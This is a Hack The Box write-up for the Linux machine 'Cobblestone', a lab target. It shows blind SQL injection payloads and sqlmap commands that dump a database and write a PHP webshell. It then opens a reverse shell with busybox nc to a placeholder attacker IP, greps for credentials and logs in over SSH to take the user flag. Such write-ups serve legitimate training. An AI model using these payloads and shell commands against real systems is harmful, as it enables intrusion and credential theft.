Cobblestone - Hack The Box
Platform: Linux
IP: 10.10.11.81
Difficulty: Insane
Author: NoSec
wanna go deeper? unlock short videos & early root chains by joining backdoor crew
💀 join the backdoor crewEditing the hosts file
Add the Cobblestone domains so the vhosts resolve.
sudo nano /etc/hosts
10.10.11.81 cobblestone.htb vote.cobblestone.htb
Recon – Service enumeration
Nmap port scan
Two open ports: web + SSH.
nmap -sVC cobblestone.htb
PORT STATE SERVICE VERSION
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-17 12:02 CEST
Nmap scan report for 10.10.11.81
Host is up (0.030s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
| 256 50:ef:5f:db:82:03:36:51:27:6c:6b:a6:fc:3f:5a:9f (ECDSA)
|_ 256 e2:1d:f3:e9:6a:ce:fb:e0:13:9b:07:91:28:38:ec:5d (ED25519)
80/tcp open http Apache httpd 2.4.62
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Did not follow redirect to http://cobblestone.htb/
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds
Vhosts / surface
- cobblestone.htb – main site (skin uploader; sandbox vibes)
- vote.cobblestone.htb – “submit a URL to vote” (server-side fetch)
Bug ID — Blind SQLi @ vote.cobblestone.htb
On vote.cobblestone.htb, the URL field is processed server-side. Quick payload flip shows boolean responses → BSQLi.
http://x'+AND+'1'='1 # ok
http://x'+AND+'1'='2 # different response
Capture the POST with Burp, save as vote.req.
Weaponize with sqlmap
Enumerate, then abuse --file-write to drop a webshell inside the Vote vhost (the main site is jailed; this isn’t).
# enumerate
sqlmap -r vote.req -p url --level 5 --risk 3 --batch --threads 5
# (optional) dump what you need
sqlmap -r vote.req --batch -D vote --dump-all
# drop shell into the vote app root
sqlmap -r vote.req --batch \
--file-write=./shell.php \
--file-dest=/var/www/vote/shell.php
shell.php:
<?php system($_REQUEST['cmd'] ?? 'id');
Shell —> www-data
Start a listener:
nc -lvnp 4444
Trigger reverse:
curl -s http://vote.cobblestone.htb/shell.php \
--data-urlencode 'cmd=busybox nc YOUR_IP 4444 -e /bin/bash'
Now you’re www-data in the Vote context (no jail).
Creds loot → SSH user
Hunt configs and DB creds from the app:
# common stash
ls -la /var/www/vote
grep -R "pass\|user\|dsn" -n /var/www/vote 2>/dev/null | head
# if DB creds found, dump users
mysql -u DBUSER -p'DBPASS' -h 127.0.0.1 vote -e 'select * from users;'
Try the recovered password for the `` user via SSH:
ssh cobble@cobblestone.htb
If you hit a restricted shell (rbash), it’s fine — you only need the flag.
User flag
cat ~/user.txt
✅ User flag obtained!
🔐 The root part drops later in the private Telegram group while the box is active.\ 📡 t.me/nosecpwn
☕ invite me for a coffee so i don’t fall asleep writing the next writeup
💻 support nosec